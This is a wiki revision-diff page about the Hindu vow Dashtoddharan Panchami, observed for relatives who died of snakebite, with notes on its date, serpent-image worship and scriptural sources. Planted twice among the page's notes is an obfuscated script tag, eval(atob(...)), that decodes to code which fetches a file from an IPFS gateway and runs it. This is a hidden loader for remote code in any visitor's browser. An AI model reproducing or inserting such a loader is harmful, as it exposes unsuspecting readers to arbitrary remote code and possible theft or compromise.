Difference between revisions of "दष्टोद्धरण पचंमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 4: Line 4:
 
*स्वर्ण, रजत, काष्ठ या मिट्टी से निर्मित पाँच फणों वाले सर्प की मूर्ति की धूप, पुष्प, गंध आदि से पूजा की जाती है।  
 
*स्वर्ण, रजत, काष्ठ या मिट्टी से निर्मित पाँच फणों वाले सर्प की मूर्ति की धूप, पुष्प, गंध आदि से पूजा की जाती है।  
 
*प्रत्येक मास में द्वादशी में से एक नाम लिया जाता है।  
 
*प्रत्येक मास में द्वादशी में से एक नाम लिया जाता है।  
*सर्पदंश से मृत व्यक्ति पाताल लोकों से मुक्त होता है और स्वर्गारोहण करता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 90-93); हेमाद्रि (व्रत्खण्ड 1, 560-562); कृत्यरत्नाकर (273-275</ref>
+
*सर्पदंश से मृत व्यक्ति [[पाताल लोक|पाताल लोकों]] से मुक्त होता है और स्वर्गारोहण करता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 90-93); हेमाद्रि (व्रत्खण्ड 1, 560-562); कृत्यरत्नाकर (273-275</ref>
 
*[[गरुड़ पुराण]] में 12 सांपों के नाम दिये गए है।<ref>गरुड़पुराण अध्याय-7, (1|129</ref>
 
*[[गरुड़ पुराण]] में 12 सांपों के नाम दिये गए है।<ref>गरुड़पुराण अध्याय-7, (1|129</ref>
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 12:25, 24 February 2012

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad shukl paksh ki panchami ko yah vrat hota hai.
  • sarpadansh se mrit kisi sambandhi (yatha–putr, bhaee, putri) ke lie kiya jata hai.
  • svarn, rajat, kashth ya mitti se nirmit paanch phanoan vale sarp ki moorti ki dhoop, pushp, gandh adi se pooja ki jati hai.
  • pratyek mas mean dvadashi mean se ek nam liya jata hai.
  • sarpadansh se mrit vyakti patal lokoan se mukt hota hai aur svargarohan karata hai.[1]
  • garu d puran mean 12 saanpoan ke nam diye ge hai.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 90-93); hemadri (vratkhand 1, 560-562); krityaratnakar (273-275
  2. garu dapuran adhyay-7, (1|129

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>